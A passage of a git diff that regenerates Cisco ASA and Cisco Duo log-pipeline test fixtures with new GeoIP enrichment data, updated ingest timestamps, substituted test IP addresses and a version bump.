{ "severity": 2, - "ingested": "2021-12-09T13:34:16.395351500Z", + "ingested": "2021-12-14T14:39:02.289553994Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4024,7 +4024,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395356800Z", + "ingested": "2021-12-14T14:39:02.289554379Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4088,7 +4088,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395361500Z", + "ingested": "2021-12-14T14:39:02.289554759Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4152,7 +4152,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395366900Z", + "ingested": "2021-12-14T14:39:02.289555141Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4216,7 +4216,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395372200Z", + "ingested": "2021-12-14T14:39:02.289555524Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4280,7 +4280,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395377500Z", + "ingested": "2021-12-14T14:39:02.289555905Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4344,7 +4344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395382700Z", + "ingested": "2021-12-14T14:39:02.289556291Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4419,7 +4419,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395387Z", + "ingested": "2021-12-14T14:39:02.289556698Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4484,7 +4484,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:34:16.395390600Z", + "ingested": "2021-12-14T14:39:02.289557100Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4547,7 +4547,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395394500Z", + "ingested": "2021-12-14T14:39:02.289557477Z", "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4628,7 +4628,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395398600Z", + "ingested": "2021-12-14T14:39:02.289557870Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4706,7 +4706,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395403900Z", + "ingested": "2021-12-14T14:39:02.289558261Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", @@ -4785,7 +4785,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395409300Z", + "ingested": "2021-12-14T14:39:02.289558702Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4849,7 +4849,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395414600Z", + "ingested": "2021-12-14T14:39:02.289559092Z", "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", @@ -4905,7 +4905,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395419700Z", + "ingested": "2021-12-14T14:39:02.289559488Z", "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395424200Z", + "ingested": "2021-12-14T14:39:02.289559879Z", "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", @@ -4994,20 +4994,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5063,7 +5057,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395429600Z", + "ingested": "2021-12-14T14:39:02.289560272Z", "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)", "code": "302013", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json index 68ceea4834c..89fafd430bd 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json @@ -47,7 +47,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:24.465484300Z", + "ingested": "2021-12-14T14:39:10.763679209Z", "original": "Oct 20 2019 15:42:54: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf53204:10.13.170.13/5060 to ACI-App_VRF:172.16.90.3 from OPTIONS message", "code": "607001", "kind": "event", @@ -115,7 +115,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:24.465492800Z", + "ingested": "2021-12-14T14:39:10.763682383Z", "original": "Jun 08 2020 12:59:57: %ASA-6-607001: Pre-allocate SIP SIGNALLING UDP secondary channel for vrf53204:10.18.133.23/5060 to ACI-App_VRF:172.16.74.3 from OPTIONS message", "code": "607001", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:24.465498400Z", + "ingested": "2021-12-14T14:39:10.763682882Z", "original": "Aug 6 2020 11:01:37: %ASA-6-607001: Pre-allocate SIP NOTIFY UDP secondary channel for vrf52304:10.18.170.54/5060 to ACI-App_VRF:172.16.72.5 from 200 message", "code": "607001", "kind": "event", @@ -214,6 +214,18 @@ "ip": "10.13.133.64" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -251,7 +263,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:24.465503900Z", + "ingested": "2021-12-14T14:39:10.763683296Z", "original": "Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:67.43.156.12 from REGISTER message", "code": "607001", "kind": "event", diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml index efaab5d515e..e0494dcfebf 100644 --- a/packages/cisco_asa/manifest.yml +++ b/packages/cisco_asa/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_asa title: Cisco ASA -version: 1.3.1 +version: 1.3.2 license: basic description: Collect logs from Cisco ASA with Elastic Agent. type: integration diff --git a/packages/cisco_duo/_dev/deploy/docker/files/config.yml b/packages/cisco_duo/_dev/deploy/docker/files/config.yml index 4970c1c9917..b072ddc223f 100644 --- a/packages/cisco_duo/_dev/deploy/docker/files/config.yml +++ b/packages/cisco_duo/_dev/deploy/docker/files/config.yml @@ -10,7 +10,7 @@ rules: responses: - status_code: 200 body: | - {"response":{"authlogs":[{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}},{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}}]},"stat":"OK"} + {"response":{"authlogs":[{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}},{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}}]},"stat":"OK"} - path: /admin/v1/logs/offline_enrollment methods: ["GET"] responses: diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml index 889158c7504..9b4774cf8ec 100644 --- a/packages/cisco_duo/changelog.yml +++ b/packages/cisco_duo/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json index 665555b1e29..eeccba904db 100644 --- a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json +++ b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json @@ -7,7 +7,7 @@ }, "event": { "action": "activation_begin", - "ingested": "2021-09-22T06:45:47.125628487Z", + "ingested": "2021-12-14T14:39:14.049568294Z", "original": "{\"action\":\"activation_begin\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -33,7 +33,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-22T06:45:47.125635478Z", + "ingested": "2021-12-14T14:39:14.049571581Z", "original": "{\"action\":\"admin_activate_duo_push\",\"description\":\"{\\\"number\\\": \\\"+12345678901\\\", \\\"extension\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"940-967-2177\",\"timestamp\":1626781477,\"username\":\"\"}", "kind": "event", "action": "admin_activate_duo_push", @@ -69,7 +69,7 @@ "event": { "reason": "Starting activation process", "action": "activation_begin", - "ingested": "2021-09-22T06:45:47.125638401Z", + "ingested": "2021-12-14T14:39:14.049572080Z", "original": "{\"action\":\"activation_begin\",\"description\":\"Starting activation process\",\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -97,7 +97,7 @@ }, "event": { "action": "activation_set_password", - "ingested": "2021-09-22T06:45:47.125641122Z", + "ingested": "2021-12-14T14:39:14.049572473Z", "original": "{\"action\":\"activation_set_password\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 44: 09+00: 00\",\"object\":\"narroway\",\"timestamp\":1626781449,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -127,14 +127,14 @@ "version": "1.11.0" }, "event": { + "ingested": "2021-12-14T14:39:14.049572865Z", + "original": "{\"action\":\"admin_self_activate\",\"description\":\"{\\\"name\\\": \\\"narroway\\\", \\\"phone\\\": \\\"+12345678901\\\", \\\"is_temporary_password\\\": false, \\\"email\\\": \\\"narroway@example.com\\\", \\\"hardtoken\\\": null, \\\"role\\\": \\\"Owner\\\", \\\"status\\\": \\\"Pending Activation\\\", \\\"restricted_by_admin_units\\\": false, \\\"administrative_units\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"jsmith\",\"timestamp\":1626781477,\"username\":\"narroway\"}", + "kind": "event", "action": "admin_self_activate", "category": "iam", - "ingested": "2021-09-22T06:45:47.125643826Z", - "original": "{\"action\":\"admin_self_activate\",\"description\":\"{\\\"name\\\": \\\"narroway\\\", \\\"phone\\\": \\\"+12345678901\\\", \\\"is_temporary_password\\\": false, \\\"email\\\": \\\"narroway@example.com\\\", \\\"hardtoken\\\": null, \\\"role\\\": \\\"Owner\\\", \\\"status\\\": \\\"Pending Activation\\\", \\\"restricted_by_admin_units\\\": false, \\\"administrative_units\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"jsmith\",\"timestamp\":1626781477,\"username\":\"narroway\"}", "type": [ "admin" ], - "kind": "event", "outcome": "success" }, "user": { @@ -172,7 +172,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-22T06:45:47.125646491Z", + "ingested": "2021-12-14T14:39:14.049573356Z", "original": "{\"action\":\"admin_update\",\"description\":\"{\\\"phone\\\": \\\"+451234567890\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "admin_update", @@ -211,7 +211,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-22T06:45:47.125649181Z", + "ingested": "2021-12-14T14:39:14.049573744Z", "original": "{\"action\":\"user_update\",\"description\":\"{\\\"realname\\\": \\\"test 4\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "user_update", @@ -254,7 +254,7 @@ "version": "1.11.0" }, "event": { - "ingested": "2021-09-22T06:45:47.125651772Z", + "ingested": "2021-12-14T14:39:14.049574133Z", "original": "{\"action\":\"user_update\",\"description\":\"{\\\"email\\\": \\\"narroway@example.com\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "user_update", diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log index c58e3492ecb..0e446a74184 100644 --- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log +++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log @@ -1,5 +1,5 @@ -{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}} -{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} -{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.131","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-08-12T09:14:23.060168+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1628759663,"txid":"861a81e7-1f60-4865-95eb-57d9c43ce073","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} -{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:20:54.700050+00:00","ood_software":null,"reason":"user_marked_fraud","result":"fraud","timestamp":1627024854,"txid":"78e1a910-350b-4226-828b-edb0ac2f2e3c","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} -{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:19:34.702203+00:00","ood_software":null,"reason":"user_mistake","result":"denied","timestamp":1627024774,"txid":"e22120cd-7388-424f-aa0a-b60cad42d8f3","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} \ No newline at end of file +{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}} +{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} +{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.131","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-08-12T09:14:23.060168+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1628759663,"txid":"861a81e7-1f60-4865-95eb-57d9c43ce073","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} +{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:20:54.700050+00:00","ood_software":null,"reason":"user_marked_fraud","result":"fraud","timestamp":1627024854,"txid":"78e1a910-350b-4226-828b-edb0ac2f2e3c","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} +{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:19:34.702203+00:00","ood_software":null,"reason":"user_mistake","result":"denied","timestamp":1627024774,"txid":"e22120cd-7388-424f-aa0a-b60cad42d8f3","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} \ No newline at end of file diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index 99e613cacda..e8b524d0525 100644 --- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json @@ -7,30 +7,30 @@ }, "related": { "ip": [ - "169.232.89.219", + "89.160.20.156", "192.168.225.254" ] }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -118.4414, - "lat": 34.0648 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { - "number": 52, + "number": 29518, "organization": { - "name": "University of California, Los Angeles" + "name": "Bredband2 AB" } }, - "address": "169.232.89.219", + "address": "89.160.20.156", "user": { "name": "narroway@example.com", "id": "DU3KC77WJ06Y5HIV7XKQ", @@ -42,12 +42,12 @@ ] } }, - "ip": 